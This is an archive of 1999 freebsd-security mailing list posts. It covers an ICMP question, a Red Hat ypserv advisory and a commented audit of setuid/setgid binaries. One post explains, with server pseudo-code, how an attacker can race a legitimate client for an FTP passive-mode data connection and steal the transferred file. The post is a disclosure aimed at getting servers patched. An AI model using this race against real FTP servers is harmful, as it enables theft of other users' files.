From owner-freebsd-security Sun Oct 31 1: 7:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from fsfw.freesoft.hu (fsfw.freesoft.hu [195.228.127.1]) by hub.freebsd.org (Postfix) with ESMTP id 9DF1D14FED for ; Sun, 31 Oct 1999 01:07:05 -0800 (PST) (envelope-from dbeck@freesoft.hu) Received: (from ftp@localhost) by fsfw.freesoft.hu (8.8.7/8.7.3) id KAA14488 for ; Sun, 31 Oct 1999 10:06:59 +0100 X-Authentication-Warning: fsfw.freesoft.hu: ftp set sender to using -f Received: by netfinity.freesoft.hu with Internet Mail Service (5.5.2232.9) id ; Sun, 31 Oct 1999 10:05:24 +0100 Message-Id: <1BD5A68BE9E8D211BBE8006094B9EB73E982@netfinity.freesoft.hu> From: Beck David To: "'freebsd-security@FreeBSD.ORG'" Subject: RE: Strange things on my computer / Help Date: Sun, 31 Oct 1999 10:05:23 +0100 Mime-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2232.9) Content-Type: text/plain; charset="iso-8859-2" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Beck David writes: > > Beck David writes: > > > - but the kernel complains in every 10 minutes for some _out_ going > > > ICMP packets, which goes to two hosts. > > What kind of ICMP packets? > - The ICMP type is 3.3: port unreachable Oh - that's totally benign. Some box is trying to connect to an unbound port on your box; if it's a local box, it's probably a simple configuration error. :: Yep, actually I ipfw out all the udp traffic except dns. :: Am I correct if I think that if it is denied by ipfw it shouldn't generate :: an ICMP reply ? :: Another strange thing I found, that uptime which I run periodically :: from cron, suddenly started bitching , because it didn't find /dev//root (??). :: After I made world :) , it stopped complaining. :: Another thing: the make buildworld failed a couple of times because of an unresolved :: external: realhostname at fingerd and ftpd. :: Then I started to figure out, what happened. But before I really did something it :: suddenly become OK. May be it has no meaning, I become paranoid a bit ... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 31 3:51:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from adm.sci-nnov.ru (adm.sci-nnov.ru [195.122.226.2]) by hub.freebsd.org (Postfix) with ESMTP id DB9B514E34 for ; Sun, 31 Oct 1999 03:51:23 -0800 (PST) (envelope-from 3APA3A@SECURITY.NNOV.RU) Received: from anonymous.sandy.ru (anonymous.sandy.ru [195.122.226.12]) by adm.sci-nnov.ru (8.9.3/Dmiter-4.1) with ESMTP id OAA18102; Sun, 31 Oct 1999 14:48:35 +0300 (MSK) Date: Sun, 31 Oct 1999 14:48:47 +0300 From: "3APA3A" <3APA3A@SECURITY.NNOV.RU> X-Mailer: The Bat! (v1.34) S/N D33CD428 Reply-To: "3APA3A" <3APA3A@SECURITY.NNOV.RU> Organization: Sandy Info X-Priority: 3 (Normal) Message-ID: <8617.991031@sandy.ru> To: "David Schwartz" , Warren Young , Sebastian , CyberPsychotic Cc: vulN-DEV@SECURITYFOCUS.COM, security@freebsd.org Subject: Re[2]: FreeBSD listen() In-reply-To: <000201bf2324$208587c0$021d85d1@youwant.to> References: <000201bf2324$208587c0$021d85d1@youwant.to> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 31.10.99 1:14, you wrote: FreeBSD listen(); I've got a lot of messages saying there is no security problem. Ok. I don't know is it problem of backlog and operation system or is it problem of FTPd, but at least FTPd 6.0 shipped with FreeBSD , WU-ftpd 2.4 and console FTP clients from and FreeBSD are vulnerable to file stealing attack on any OS where listen(sock, 1) doesn't limits pending queue to exactly one. And only in this case. Let me show. Lets look to "file stealing attack" where data transmitted from FTPD to client in passive mode. Look how FTPD works after retrieving "PASV" command: 1. <- PASV .... sock=socket(..) bind(sock,...) ... listen(sock, 1) /* port is opened and is ready to attack */ /* Now FTPD should inform client which socket is listened */ 2. -> 227 Entering Passive Mode (a1,a2,a3,a4,p1,p2) /* Client connects dataport, server _waits_ for RETR command */ /* NOTE!!! There is no accept() yet!!!! */ /* This is the point where both hacker and client can connect to server */ 3 <- RETR filename.ext /* now, then filename is known, server begins transmission. */ /* server forks to handle both control and data connection*/ if ( !(child=fork() ) { /* data thread */ data = accept(sock, ...); close(sock); /* only at that point listening port is closed!!! But "RETR" */ /* command is already received!! */ .... /* send file to "data". */ } ..... The problem of this code is that accept() is called _after_ any connections are established. So real number of established connections is limited only by backlog. Now lets understand how will attack go on in case listen(sock, 1) really limits queue to 1 and if it's not. a) Assuming backlog works fine. Both client and hacker are trying to connect server (it's between 1. and 3. Only one connection is succeeded. If client succeed then hacker fails and there is no chance to attack. If hacker succeed and client fails than client _will not_ send "RETR" command and server will never begin data transfer. So attack fails. This code is safe. b) Assuming backlog doesn't works. And 2 connections will be queued. Both hacker's connect() and client's connect() will be succeed (note!!! it's not accept() establishes connection! accept() just takes connection from pending queue!). Client sends "RETR" command _but_ _only_ _hacker's_ _connection_ _will_ _be_ _accept()ed_!!!! Client connection will be close()d with sock, and client will fail - but it's too late, because data transmission already began and data goes to hacker. And this code is unsafe. You see the problem is. If you think it's not backlog problem, then it's FTPD problem and FTPD must perform fork() accept() and close() immediately after listen(): sock=socket(..) bind(sock,...) ... listen(sock, 1) if ( !(child=fork() ) { /* data thread */ data = accept(sock, ...); close(sock); ... } else { /* port is opened but only one connection will succeed! */ /* Now FTPD should inform client which socket is listened */ 2. -> 227 Entering Passive Mode (a1,a2,a3,a4,p1,p2) ... } But it makes program more complicated, because at this point filename (or directory listing) to transfer still unknown for data thread. Some kind of interprocess communication must be implimented :( (sorry if i'm saying some stupid things - i'm not professional in UNIX programming). As i said already I'm not agree that the server should check IP address. But it's better then nothing. So.... something should be patched. I think there's no need to continue discussion in Vuln-dev, please reply privately. Sorry again for my bad English. "3APA3A" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 31 10:12:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 8C7B414BDE for ; Sun, 31 Oct 1999 10:12:52 -0800 (PST) (envelope-from cy@cschuber.net.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id KAA17280 for ; Sun, 31 Oct 1999 10:12:51 -0800 Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by point.osg.gov.bc.ca, id smtpda17278; Sun Oct 31 10:11:59 1999 Received: (from uucp@localhost) by cwsys.cwsent.com (8.9.3/8.9.1) id KAA11168 for ; Sun, 31 Oct 1999 10:11:01 -0800 (PST) Message-Id: <199910311811.KAA11168@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpde11081; Sun Oct 31 10:10:35 1999 X-Mailer: exmh version 2.1.0 09/18/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 3.3-RELEASE X-Sender: cy To: freebsd-security@freebsd.org Subject: [linux-security] Unidentified subject! (fwd) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sun, 31 Oct 1999 10:10:33 -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is not our YP server based on the same code as described below? Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Sun/DEC Team, UNIX Group Internet: Cy.Schubert@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Province of BC "e**(i*pi)+1=0" ------- Forwarded Message Return-Path: Cy.Schubert@uumail.gov.bc.ca Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id AAA31171 for ; Thu, 28 Oct 1999 00:50:03 -0700 (PDT) Resent-Message-Id: <199910280750.AAA31171@passer.osg.gov.bc.ca> Received: from localhost.osg.gov.bc.ca(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost.osg.gov.bc.ca, id smtpdq31158; Thu Oct 28 00:49:04 1999 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id AAA31150 for ; Thu, 28 Oct 1999 00:49:03 -0700 (PDT) Received: from point.osg.gov.bc.ca(142.32.102.44) via SMTP by passer.osg.gov.bc.ca, id smtpdw31148; Thu Oct 28 00:48:23 1999 Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id AAA06656 for ; Thu, 28 Oct 1999 00:48:23 -0700 Received: from lists.redhat.com(199.183.24.247) via SMTP by point.osg.gov.bc.ca, id smtpda06654; Thu Oct 28 00:48:20 1999 Received: (qmail 10047 invoked by uid 501); 28 Oct 1999 07:48:08 -0000 Prev-Resent-Date: 28 Oct 1999 07:48:08 -0000 Prev-Resent-Cc: recipient list not shown: ; MBOX-Line: From linux-security-request@redhat.com Thu Oct 28 03:48:08 1999 Date: Wed, 27 Oct 1999 22:05:30 -0400 From: Bill Nottingham To: redhat-watch-list@redhat.com Cc: linux-security@redhat.com, bugtraq@securityfocus.com Message-ID: <19991027220530.A1783@xenomorph.redhat.com> Mail-Followup-To: redhat-watch-list@redhat.com, linux-security@redhat.com, bugtraq@securityfocus.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0us Prev-Resent-Message-ID: <"JSreC3.0.iS2.u-_5u"@lists.redhat.com> Prev-Resent-From: linux-security@redhat.com Prev-Resent-Reply-To: linux-security@redhat.com X-Mailing-List: archive/latest/19 X-Loop: linux-security@redhat.com Precedence: list Prev-Resent-Sender: linux-security-request@redhat.com Subject: [linux-security] Unidentified subject! Resent-To: cy Resent-Date: Thu, 28 Oct 1999 00:49:04 -0700 Resent-From: Cy Schubert X-UIDL: aaf8b6b0aa4320a936d418ec30861f97 Status: U - --------------------------------------------------------------------- Red Hat, Inc. Security Advisory Synopsis: security problems with ypserv Advisory ID: RHSA-1999:046-01 Issue date: 1999-10-27 Updated on: 1999-10-27 Keywords: Cross references: ypserv yppasswdd rpc.yppasswdd - --------------------------------------------------------------------- 1. Topic: The ypserv package, which contains the ypserv NIS server and the yppasswdd password-change server, has been discovered to have security holes. 2. Problem description: With ypserv, local administrators in the NIS domain could possibly inject password tables. In rpc.yppasswdd, users could change GECOS and login shells of other users, and there is a buffer overflow in the md5 hash generation. It is recommended that all users of the ypserv package upgrade to the new packages. 3. Bug IDs fixed (http://developer.redhat.com/bugzilla for more info): 4. Relevant releases/architectures: Red Hat Linux 4.x, all architectures Red Hat Linux 5.x, all architectures Red Hat Linux 6.x, all architectures 5. Obsoleted by: 6. Conflicts with: 7. RPMs required: Red Hat Linux 4.x: Intel: ftp://updates.redhat.com/4.2/i386/ypserv-1.3.9-0.4.2.i386.rpm Alpha: ftp://updates.redhat.com/4.2/alpha/ypserv-1.3.9-0.4.2.alpha.rpm Sparc: ftp://updates.redhat.com/4.2/sparc/ypserv-1.3.9-0.4.2.sparc.rpm Source packages: ftp://updates.redhat.com/4.2/SRPMS/ypserv-1.3.9-0.4.2.src.rpm Red Hat Linux 5.x: Intel: ftp://updates.redhat.com/5.2/i386/ypserv-1.3.9-0.5.2.i386.rpm Alpha: ftp://updates.redhat.com/5.2/alpha/ypserv-1.3.9-0.5.2.alpha.rpm Sparc: ftp://updates.redhat.com/5.2/sparc/ypserv-1.3.9-0.5.2.sparc.rpm Source packages: ftp://updates.redhat.com/5.2/SRPMS/ypserv-1.3.9-0.5.2.src.rpm Red Hat Linux 6.x: Intel: ftp://updates.redhat.com/6.1/i386/ypserv-1.3.9-1.i386.rpm Alpha: ftp://updates.redhat.com/6.0/alpha/ypserv-1.3.9-1.alpha.rpm Sparc: ftp://updates.redhat.com/6.0/sparc/ypserv-1.3.9-1.sparc.rpm Source packages: ftp://updates.redhat.com/6.1/SRPMS/ypserv-1.3.9-1.src.rpm 8. Solution: For each RPM for your particular architecture, run: rpm -Uvh 'filename' where filename is the name of the RPM. 9. Verification: MD5 sum Package Name - -------------------------------------------------------------------------- d384966683e0c59b7c63d2d0fcba79ce ypserv-1.3.9-0.4.2.i386.rpm e8e860c754e894b955c2ec3e73bcad8d ypserv-1.3.9-0.4.2.alpha.rpm 19cfbc0bf8ef5ed272243d74020b69df ypserv-1.3.9-0.4.2.sparc.rpm df131f369bfb64d1b093447168484e38 ypserv-1.3.9-0.4.2.src.rpm 51a38316e72f25b6751ade459728f049 ypserv-1.3.9-0.5.2.i386.rpm 65da86b0b61ae70b82a5b3fe17b77803 ypserv-1.3.9-0.5.2.alpha.rpm 2956fc958456d5a91d697043932266bd ypserv-1.3.9-0.5.2.sparc.rpm dda2d28bb89cddb9ecb4409778a548f9 ypserv-1.3.9-0.5.2.src.rpm c1a566b7535bb51e25d9c1743f822682 ypserv-1.3.9-1.i386.rpm a8f5a82d450ddb2b42068537859c18ae ypserv-1.3.9-1.alpha.rpm 6759503c9cc688bcd1902f6511ecc60a ypserv-1.3.9-1.sparc.rpm f7e8b5a241c4e873822c83be2f0cf566 ypserv-1.3.9-1.src.rpm These packages are GPG signed by Red Hat, Inc. for security. Our key is available at: http://www.redhat.com/corp/contact.html You can verify each package with the following command: rpm --checksig If you only wish to verify that each package has not been corrupted or tampered with, examine only the md5sum with the following command: rpm --checksig --nogpg 10. References: <19991024163423.6665A67B0@Galois.suse.de> - -- - ---------------------------------------------------------------------- Please refer to the information about this list as well as general information about Linux security at http://www.aoy.com/Linux/Security. - ---------------------------------------------------------------------- To unsubscribe: mail -s unsubscribe linux-security-request@redhat.com < /dev/null ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 31 18:27:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from anarcat.dyndns.org (phobos.IRO.UMontreal.CA [132.204.20.20]) by hub.freebsd.org (Postfix) with ESMTP id A67B714F5E for ; Sun, 31 Oct 1999 18:27:05 -0800 (PST) (envelope-from spidey@anarcat.dyndns.org) Received: by anarcat.dyndns.org (Postfix, from userid 1000) id 81C371BD4; Sun, 31 Oct 1999 21:27:57 -0500 (EST) From: Spidey MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="zWSB4S2w7L" Content-Transfer-Encoding: 7bit Message-ID: <14364.64172.638014.558487@anarcat.dyndns.org> Date: Sun, 31 Oct 1999 21:27:56 -0500 (EST) To: freebsd-security@freebsd.org Subject: Examining FBSD set[ug]ids and their use X-Mailer: VM 6.72 under 21.1 "20 Minutes to Nikko" XEmacs Lucid (patch 2) Reply-To: Spidey Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --zWSB4S2w7L Content-Type: text/plain; charset=us-ascii Content-Description: message body text Content-Transfer-Encoding: 7bit Hi. I started 'compiling' some info about the use of the setuid and setgid files in FreeBSD. I took my list of suid files in /var/log/setuid.* and checked what the effect would be if I removed the set[ug]id bits. So I came up with this list. And I thought it would be a good idea to have it in a mtree(1) format so that I could make have a place to store the original permissions of the files or to be able to revert them to how I want them if I do a make world or something like that, or whatever. I was also thinking of writing some program to examine each suid binary and ask interactively if we want to keep it this way. But I think that the list was enough work for now. Feel free to email comments and corrections, I'll be happy to include them in the list. There are some programs that I do not know well or that I do not understand why they're suid, so... I haven't put this on the web yet but it won't be long. --zWSB4S2w7L Content-Type: text/plain Content-Disposition: inline; filename="setugid.txt" Content-Transfer-Encoding: 7bit # This is the list of set[ug]id programs on my 3.3-Stable box. # Each comment shows why the set[ug]id bit is there # "Users" mean generally "unprivileged users" # A ? means "unknown" or "lacks exploration" # # Notes: # - this list is probably portable to other systems, and should probably be. # - This should be included in a mtree-like program that would be able # to disable or enable some s[gu]id on demand. I think I'll start coding... :) /set type=dir . bin /set type=file uname=root gname=wheel mode=4555 # The suid bit is NOT necessary for any usage I could find... df gname=operator mode=2555 # Allow users to see processes? Users cannot see the 'STARTED' and # 'TIME' columns, from ps aux... I don't want to dig much more.. ps gname=kmem mode=2555 # See /bin/rsh rcp /unset mode uname gname /set type=dir .. sbin /set type=file uname=root gname=wheel mode=2555 # I don't have a ccd... I can't test this. ccdconfig gname=kmem # Users must be able to read /dev/mem to consult current dmesg # I don't think random users need to consult dmesg. dmesg gname=kmem /set gname=tty # Allow users to dump on remote (see dump(1), the BUGS section) dump gname=tty rdump gname=tty restore gname=tty rrestore gname=tty /set gname=wheel # Allow users to bind on a socket (which? where?) ping mode=4555 # Allow users to consult routing tables route mode=4555 # Allow operators to shutdown the machine shutdown gname=operator mode=4550 /unset mode uname gname /set type=dir .. usr X11R6 bin /set type=file uname=root gname=wheel mode=4755 # Allow users to grab the console or to write to utmp Eterm # ????? Look what's here?! Xwrapper mode=4711 # High scores management angband uname=bin gname=games mode=2555 # High scores management cconq uname=games gname=bin # Probably to allow users to access video memory # This programs fails running with: #$ dga # X Error of failed request: BadMatch (invalid parameter attributes) # Major opcode of failed request: 78 (X_CreateColormap) # Serial number of failed request: 12 # Current serial number in output stream: 269 #$ # So I guess a suid bit isn't a good idea, but without it: #$ dga #Must be suid root #$ dga mode=4711 # Allow users to grab the console or to write to utmp # I think there is a root shell exploit possible with earlier versions # of rxvt so this shouldn't be suid... rxvt mode=4711 # High scores management sol uname=games gname=games mode=6755 # This is to bind on sockets and read some info from the kernel wminet gname=kmem mode=2755 # High scores management xboing gname=games mode=2755 # High scores management xconq uname=games gname=bin # Allow users to read cpu state in kernel memory xcpustate gname=kmem mode=2755 # High scores management xgalaga gname=games mode=2755 # Allow users to read master.passwd xlock mode=4111 # High scores management xpat2 gname=games mode=2555 # Allow users to see various info like the load and stuff from the # kernel activity xperfmon++ gname=kmem mode=2755 # High scores management xpiperman gname=games mode=2755 # High scores management xsoldier # Allow users to read system info from the kernel xsysinfo gname=kmem mode=2755 # Allow users to write to utmp or grab the console xterm mode=4711 # High scores management yamsweeper uname=games gname=bin /unset mode uname gname /set type=dir .. .. bin /set type=file mode=4555 uname=root gname=wheel # Allow users to write in the at queue. Would be interesting to be run # in a sandbox... These 4 are hardlinks at atq atrm batch # Allow users to edit their /etc/passwd info # These are links to chpass chfn chpass chsh ypchfn ypchpass ypchsh passwd yppasswd # Allow users to change their crontab file in /var/cron/tabs crontab # Allow users to write on a port. Should not be public, IMHO. Should # be (at least) "-r-sr-x--- uucp dialer" or something like that... cu mode=6555 uname=uucp gname=dialer # Allow users to see opened file info from the kernel fstat mode=2555 gname=kmem # Hum. This file is not in my system right now. I DON'T KNOW WHY. hoststat # Allow users to read IPC (System V shared memory) info from the # kernel ipcs mode=2555 gname=kmem # Allow users to read /etc/skeykeys keyinfo # Allow users to use the S/Key system (again R/W of /etc/skeykeys) keyinit # Allow users to use the -p option, which is to use the current login # password to lock the terminal lock # Allow users to read master.passwd, skeykeys and probably other # things... login # Allow users to read the lp queue? # Allow users to write various parts of the lp system... /set mode=6555 gname=daemon lpq lpr lprm /set mode=4555 uname=root gname=wheel # Allow users to read the mail queue # Again, this is part of the sendmail suite and _can_ be replaced :) mailq # Allow users to use the catman cache man uname=man # Allow users to read the kernel net stats netstat gname=kmem mode=2555 # Allow users to regenerate the aliases database. # Why the hell should anyone else than the one that has modified the # database would want to rebuild it???? newaliases # Allow users to access nfs stats nfsstat mode=2555 gname=kmem # Allow users to consult their quota quota # Allow these to bind on a priviledged port for remote authentication rlogin rsh # Allow users to use setuid perl scripts easier /set mode=4511 sperl5.00502 sperl5.00503 suidperl /set mode=4555 # Allow users to 'read' /etc/master.passwd su # This is all the same kind of accesses to the kernel memory /set mode=2555 uname=root gname=kmem systat top uptime # I never understood what uucp was.... /set mode=4555 uname=uucp gname=wheel uucp uuname uustat gname=dialer mode=6555 uux /set mode=4555 uname=root gname=wheel # Allow users read kmem VM stats.... vmstat mode=2555 gname=kmem # Allow users to see who's online w mode=2555 gname=kmem # Allow users to write on another's tty /set mode=2555 uname=root gname=tty wall write /unset mode uname gname /set type=dir .. games /set type=file mode=2555 uname=root gname=games # "Gaming" management dm /unset mode uname gname /set type=dir .. libexec /set type=file mode=4555 uname=root gname=wheel # Allow users to 'mail' others (in fact, that's 'writing on another's # mailbox) mail.local # uucp things... /unset mode uname gname /set type=dir uucp /set type=file mode=6555 uname=uucp gname=dialer uucico uuxqt mode=6550 gname=uucp /unset mode uname gname /set type=dir .. .. local bin /set type=file mode=4555 uname=root gname=wheel # Allow users to lock files in procmail lockfile mode=2755 gname=mail # This is the skill program. I think the sgid kmem is for reading # process info. But it should not be needed, IMHO skill mode=2755 gname=kmem snice mode=2755 gname=kmem # Same as rsh and such. ssh1 mode=4711 # Allow users to see the 'flow' of data through network connections # Strangely, pppload(1), a similar program, does _not_ net sgid # privileges # ?????? Why isn't that in $(X11BASE) ??? wmnet mode=2555 uname=bin gname=kmem # High scores management xmame mode=2111 gname=games /unset mode uname gname /set type=dir .. sbin /set type=file mode=4555 uname=root gname=wheel # Allow users to read opened files in the kernel lsof mode=2755 gname=kmem # This is the only set[ug]id program from the postfix suite, and is # not necessary if you agree to have a world writable drop directory. postdrop mode=2755 gname=maildrop /unset mode uname gname /set type=dir .. .. sbin /set type=file mode=4555 uname=root gname=wheel # Allow users to read I/O stats from the kernel iostat mode=2555 gname=kmem # Allow misc users to cancel print jobs lpc mode=2555 gname=daemon # Allow users to consult kernel routing tables mrinfo mtrace # This is to access the dialing line and probably modify routes and such.. # ppp provides a good enough mechanism to control users, IMHO ppp mode=4554 gname=network # Shouldn't this be as ppp? pppd # Access various informations in the kernel pstat mode=2555 gname=kmem # That's another binary that just disappeared from my box. I don't # know why. purgestat # This is the sendmail super-program that does everything. Get rid of # it, install postfix.. :) sendmail # Same as ppp sliplogin mode=4550 gname=network # Access kernel info about swap swapinfo mode=2555 gname=kmem # Allow users to read info from the timed daemon timedc # Same as ping traceroute # Allow users to read tcp debugging info trpt gname=kmem mode=2555 --zWSB4S2w7L Content-Type: text/plain; charset=iso-8859-1 Content-Description: message body text Content-Transfer-Encoding: quoted-printable Oh... and my box is: FreeBSD anarcat.dyndns.org 3.3-STABLE FreeBSD 3.3-STABLE #6: Wed Oct 27= 11:44:59 EDT 1999 root@anarcat.dyndns.org:/usr/src/sys/compile/HAL= L i386 The AnarCat. --=20 Si l'image donne l'illusion de savoir C'est que l'adage pr=E9tend que pour croire, L'important ne serait que de voir Lofofora --zWSB4S2w7L-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 31 19:36:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from alcanet.com.au (border.alcanet.com.au [203.62.196.10]) by hub.freebsd.org (Postfix) with ESMTP id 2793E14A16 for ; Sun, 31 Oct 1999 19:36:42 -0800 (PST) (envelope-from jeremyp@gsmx07.alcatel.com.au) Received: by border.alcanet.com.au id <40332>; Mon, 1 Nov 1999 14:31:18 +1100 Content-return: prohibited Date: Mon, 1 Nov 1999 14:36:32 +1100 From: Peter Jeremy Subject: Re: Examining FBSD set[ug]ids and their use In-reply-to: <14364.64172.638014.558487@anarcat.dyndns.org> To: Spidey Cc: freebsd-security@FreeBSD.ORG Reply-To: peter.jeremy@alcatel.com.au Message-Id: <99Nov1.143118est.40332@border.alcanet.com.au> MIME-version: 1.0 X-Mailer: Mutt 1.0pre3i Content-type: text/plain; charset=us-ascii References: <14364.64172.638014.558487@anarcat.dyndns.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 1999-Nov-01 13:27:56 +1100, Spidey wrote: >I started 'compiling' some info about the use of the setuid and setgid >files in FreeBSD. An excellent idea. Note that some of the files you specify are ports. As a general rule, anything that is setgid kmem should be converted to a new sysctl with an unprivileged task to access it. ># Allow users to see processes? Users cannot see the 'STARTED' and ># 'TIME' columns, from ps aux... I don't want to dig much more.. > ps gname=kmem mode=2555 I believe it's necessary for users to see other users' processes. The information should probably be available via /proc instead. ># I don't have a ccd... I can't test this. > ccdconfig gname=kmem Probably unnecessary. No-one but root needs to be able to run ccdconfig. ># Allow users to dump on remote (see dump(1), the BUGS section) > dump gname=tty > rdump gname=tty > restore gname=tty > rrestore gname=tty As I recall it, this is to allow dump/restore to write to the console (and wake up the operator) when it needs feeding. ># Allow users to bind on a socket (which? where?) > ping mode=4555 Needed to allow ordinary mortals to sent raw IP (ICMP) packets. ># Allow users to consult routing tables > route mode=4555 Needed to allow ordinary mortals to access the routing socket. This is probably another sysctl candidate. ># ????? Look what's here?! > Xwrapper mode=4711 This is a wrapper for the X-server. The idea is that Xwrapper is slightly smaller :-) and less subject to security holes. ># Allow users to read master.passwd, skeykeys and probably other ># things... > login Necessary to allow users to log in as another user. ># Allow users to read the mail queue ># Again, this is part of the sendmail suite and _can_ be replaced :) > mailq Hard link to newaliases and sendmail. Only needs root for local mail delivery in the absence of a setuid local delivery agent. (It's fairly trivial to sandbox sendmail). ># Allow users to use the catman cache ^^^ update > man uname=man ># Allow users to 'read' /etc/master.passwd > su Actually it's to allow users to change thir uid. ># I never understood what uucp was.... >/set mode=4555 uname=uucp gname=wheel > uucp > uuname > uustat gname=dialer mode=6555 > uux UUCP lives in it's own sandbox. ># "Gaming" management > dm All games live in their own group for sandboxing. ># This is the sendmail super-program that does everything. Get rid of ># it, install postfix.. :) Religious comments don't belong in a file being touted as a part of generic FreeBSD. Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 1:54:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from indyio.rz.uni-sb.de (indyio.rz.uni-sb.de [134.96.7.3]) by hub.freebsd.org (Postfix) with ESMTP id 1CBA214D06 for ; Mon, 1 Nov 1999 01:54:31 -0800 (PST) (envelope-from netchild@Vodix.CS.Uni-SB.de) Received: from mars.rz.uni-sb.de (ns0.rz.uni-sb.de [134.96.7.5]) by indyio.rz.uni-sb.de (8.9.3/8.9.3) with ESMTP id KAA7892073; Mon, 1 Nov 1999 10:54:29 +0100 (CET) Received: from work.net.local (maxtnt-135.telip.uni-sb.de [134.96.71.6]) by mars.rz.uni-sb.de (8.8.8/8.8.4/8.8.2) with ESMTP id KAA06672; Mon, 1 Nov 1999 10:54:28 +0100 (CET) Received: from Vodix.CS.Uni-SB.de (netchild@localhost.net.local [127.0.0.1]) by work.net.local (8.9.3/8.9.3) with ESMTP id KAA01378; Mon, 1 Nov 1999 10:13:53 +0100 (CET) (envelope-from netchild@Vodix.CS.Uni-SB.de) Message-Id: <199911010913.KAA01378@work.net.local> Date: Mon, 1 Nov 1999 10:13:52 +0100 (CET) From: A.Leidinger@WJPServer.CS.Uni-SB.de Subject: Re: Examining FBSD set[ug]ids and their use To: beaupran@iro.umontreal.ca Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <14364.64172.638014.558487@anarcat.dyndns.org> MIME-Version: 1.0 Content-Type: TEXT/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 31 Oct, Spidey wrote: > # Hum. This file is not in my system right now. I DON'T KNOW WHY. > hoststat Itīs part of sendmail: (78) netchild@ttyp0 > hoststat -------------- Hostname ------------ How long ago ---------Results--------- mail.uni-sb.de 43+00:00:08 Deferred: Connection refu mail.cs.uni-sb.de 18:19:47 250 QAA29309 Message acce mail.rz.uni-sb.de 18:19:47 250 PAA04660 Message acce Bye, Alexander. -- Five days a week my body is a temple. The other two, it's an amusement park. http://netchild.home.pages.de A.Leidinger+Home @ WJPServer.CS.Uni-SB.de Key fingerprint = 7423 F3E6 3A7E B334 A9CC B10A 1F5F 130A A638 6E7E To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 1 1:54:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from indyio.rz.uni-sb.de (indyio.rz.uni-sb.de [134.96.7.3]) by hub.freebsd.org (Postfix) with ESMTP id A567314E4E for ; Mon, 1 Nov 1999 01:54:29 -0800 (PST) (envelope-from netchild@Vodix.CS.Uni-SB.de) Received: from mars.rz.uni-sb.de (ns0.rz.uni-sb.de [134.96.7.5]) by indyio.rz.uni-sb.de (8.9.3/8.9.3) with ESMTP id KAA8287770; Mon, 1 Nov 1999 10:54:21 +0100 (CET) Received: from work.net.local (maxtnt-135.telip.uni-sb.de [134.96.71.6]) by mars.rz.uni-sb.de (8.8.8/8.8.4/8.8.2) with ESMTP id KAA06651; Mon, 1 Nov 1999 10:54:19 +0100 (CET) Received: from Vodix.CS.Uni-SB.de (netchild@localhost.net.local [127.0.0.1]) by work.net.local (8.9.3/8.9.3) with ESMTP id KAA01423; Mon, 1 Nov 1999 10:22:33 +0100 (CET) (envelope-from netchild@Vodix.CS.Uni-SB.de) Message-Id: <199911010922.KAA01423@work.net.local> Date: Mon, 1 Nov 1999 10:22:32 +0100 (CET) From: A.Leidinger@WJPServer.CS.Uni-SB.de Subject: Re: Examining FBSD set[ug]ids and their use To: beaupran@iro.umontreal.ca Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <14364.64172.638014.558487@anarcat.dyndns.org> MIME-Version: 1.0 Content-Type: TEXT/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 31 Oct, Spidey wrote: Oops... deleted to much from the previous mail... > # That's another binary that just disappeared from my box. I don't > # know why. > purgestat Belongs to sendmail too, it purges the hoststats. Itīs suid, but it gives a "Permission denied" if you try to exec it as an ordinary user. 